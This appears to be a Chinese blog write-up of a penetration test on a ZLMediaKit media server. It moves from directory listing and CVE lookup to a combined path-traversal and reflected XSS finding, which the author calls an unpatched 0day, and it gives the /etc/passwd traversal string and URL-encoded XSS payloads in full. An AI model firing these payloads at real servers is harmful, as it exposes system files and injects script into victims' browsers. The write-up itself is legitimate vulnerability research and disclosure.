前言
前端時間,要開放一個端口,讓我進行一次安全檢測,發現的一個漏洞。
經過
訪問之后發現是類似一個目錄索引的端口。(這里上厚碼了哈)
錯誤案例測試
亂輸內容asdasffda
之后看了一眼Burp
的抓包,抓到的內容是可以發現這是一個什么類型的服務 ——?ZLMediaKit
這里就引出了一個問題,存在文件索引算不算漏洞?還是業務需要?
信息收集
清楚是什么類型的內容,當然就要去公開搜索一下
首先搜索內容原理
通過搜索官網,大致清楚了內容,需要進行視頻流轉,但是還不能打消我的疑問
所以我進入了CVE
進行搜索,查看是否存在什么歷史漏洞
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=ZLMediaKit
翻譯了一下說是存在目錄遍歷攻擊和DDOS
查看了CNNVD
也差不多是這個意思
滲透測試
所以遍歷就確實是漏洞
推測XSS
之后專心進行滲透測試,發現我翻閱目錄的時候,回顯包是存在回顯的
推測應該是有反射XSS
專心的構造了一個跳出<h1>
標簽的反射XSS
</h1>alert(1);<h1>
XSS失敗
訪問之后才發現如果訪問不存在的頁面會跳轉到404
回顯失敗
目錄穿越測試
因為容易目錄遍歷,所以進行了一下目錄穿越測試
/../../../../../../../etc/passwd
這時候發現不存在的內容也可以回顯的樣子
目錄穿越+XSS
這給了我靈感,我可以在最后加上XSS
語句
/../../../../../../../etc/passwd/</h1>alert(1);<h1>
成功逃逸出來了ohhhh
興高采烈的將這個payload
拼接到瀏覽器進行嘗試發現失敗了
因為../../../../
直接被GET
吃掉了,決定利用Burp
對其進行url
編碼
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64%2f%3c%2f%68%31%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%3c%68%31%3e
XSS
反射成功
最后精簡了一下payload
/../alert(1);%2f%2e%2e%2f%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e
接著美滋滋提交CVE
后記
該漏洞的前置條件是內部必須有文件,在有文件的情況下測試了一下,全版本都存在該問題。
網上這類型的站點還是比較多的,目前貌似還是0day
沒看夠~?歡迎關注!
免費領取安全學習資料包!
滲透工具
技術文檔、書籍
?
面試題
幫助你在面試中脫穎而出
視頻
基礎到進階
環境搭建、HTML,PHP,MySQL基礎學習,信息收集,SQL注入,XSS,CSRF,暴力破解等等
?
應急響應筆記
學習路線